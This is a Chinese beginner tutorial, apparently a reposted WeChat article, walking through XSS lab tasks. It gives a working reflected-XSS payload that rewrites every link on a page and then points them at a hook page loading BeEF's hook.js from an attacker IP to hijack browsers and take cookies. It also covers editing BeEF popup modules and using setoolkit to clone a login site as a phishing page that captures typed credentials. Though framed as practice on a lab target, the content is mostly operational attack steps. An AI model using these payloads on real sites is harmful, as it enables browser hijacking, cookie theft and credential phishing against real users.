任务一:构建反射型XSS攻击,实现修改页面所有链接
构建一个payload需要将页面的连接也就是a标签改掉,所以其中需要写一个循环语句,语句结构:
<script>
window.onload = function(){
var link = document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href="http://www.baidu.com";}
}</script>
其中getElementsByTagName是获取页面中所有标签名为a的,也就是所有的a标签,下面一个循环语句替换所有a标签。
然后我们打开靶场将语句注入进去。
我们从上面注入进去后,查看源码发现都被替换成百度的地址了。
任务二:使用beef 劫持用户浏览器
首先我们在kali中打开beef,然后我们设置一下密码就可以加载登录后台了,后台的用户名是beef
我们登录一下,地址在这里
我们新建一个页面来加载beef的js文件,我们先启动apache
systemctl start apache2
然后我们新建一个html文件
vim /var/www/html/hook.html
然后写入
<html><head>
<scriptsrc=’http://192.168.43.15:3000/hook.js’></script>
</head><body><h1>hi</h1></body></html>
然后我们将上面的payload改一下
<script>
window.onload = function(){
var link = document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href="http://192.168.43.15/hook.html";}
}</script>
我们将payload插入进去后随便点开一个连接
然后我们打开beef就可以看到上线了。
获取cookie
任务三:实现自定义弹窗位置和大小,并在弹窗中加入图片和超链接
我们利用beef进行弹窗。
我们可以看到右下角的弹窗
我们需要进去加上图片并且修改一下弹窗的大小和位置
我们先找到路径cd /usr/share/beef-xss/modules/persistence/popunder_window
然后我们到目录下查看到底有什么内容
不出意外应该是在js中我们打开看一下
宽2和高都在这里,我们修改一下大小,给一个800x800的正方形弹窗吧。
再到弹窗的页面目录cd /usr/share/beef-xss/extensions/demos/html
然后上传一个图片后插入进去
<ahref="http://www.baidu.com"target="_blank" ><imgsrc="1.png"
width="800" height="800"></a>
我们执行一下
右边就是我上传的图片了,已经被弹窗成功执行了
任务四: 使用setoolkit制作钓鱼页面并获取用户的账号
我们首先要去kali上面打开setoolkit,然后选择社会工程学项目,顺序大概就是1-2-3-2
设置一个监听端口和需要克隆的网站网址
然后我们访问一下钓鱼站点看看
好的,一模一样,我们可以将这个连接插入到弹窗中,或者利用xss来对目标的网站插入跳转都可以。
我这里选择插入到弹窗中,我们将弹窗的图片跳转连接修改一下即可
然后我们弹窗
我们点击图片
跳转到了我们的钓鱼页面在这里输入账号密码.
我们输入的账号密码就成功回显了。同时页面也会跳转到原本的登录页面
原文始发于微信公众号(白安全组):新手基础学习—XSS攻击实战应用方式
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论